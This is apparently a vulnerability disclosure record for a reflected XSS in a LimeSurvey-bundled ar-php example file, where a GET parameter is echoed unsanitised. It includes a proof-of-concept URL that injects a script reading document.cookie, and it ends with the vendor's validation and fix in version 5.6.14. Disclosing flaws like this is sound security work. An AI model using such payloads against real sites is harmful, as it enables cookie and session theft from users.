Reflected XSS in LimeSurvey in limesurvey/limesurvey


Reported on

Mar 28th 2023


There is a XSS in Lime Survey. The $_GET['keyword'] is not sanitized :

echo $_GET['keyword'];

Proof of Concept

We can read cookie contents : http://localhost/limesurvey/vendor/khaled.alshamaa/ar-php/examples/ar_query.php?keyword=%3Cscript%3Ealert(document.cookie)%3C/script%3E&submit=%D8%A8%D8%AD%D8%AB+%28Go%29&mode=0


csrftoken=Aj9xpc4O3p8Se553QLJNlhsFTUgJ3cCp; mode=light


With XSS, the attacker can read cookies and send requests ...

We are processing your report and will contact the limesurvey team within 24 hours. 2 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 2 months ago
Carsten Schmitz modified the Severity from High (8.2) to High (7.9) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Carsten Schmitz validated this vulnerability 2 months ago
peymankf has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 5.6.14 with commit d47fe8 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Apr 3rd 2023
Carsten Schmitz published this vulnerability 2 months ago
to join this conversation